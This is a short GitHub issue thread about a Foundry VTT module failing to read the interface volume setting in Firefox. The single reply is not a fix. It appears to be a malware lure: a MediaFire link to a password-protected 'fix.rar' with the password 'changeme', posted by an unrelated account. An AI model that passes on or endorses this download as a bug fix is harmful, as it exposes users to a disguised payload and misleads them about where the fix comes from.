### ISSUE TITLE
[Bug]: Firefox not accessing interface options properly

### ISSUE THREAD

**Issue by EddieDover** [EddieDover/fvtt-player-achievements#80]
### What happened?

It seems the Firefox is not able to access the interface volume value via `game.settings.storage.get("client")["core.globalInterfaceVolume"]`. 

Currently researching.

### What type of foundry hosting were you using?

Self Hosted

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
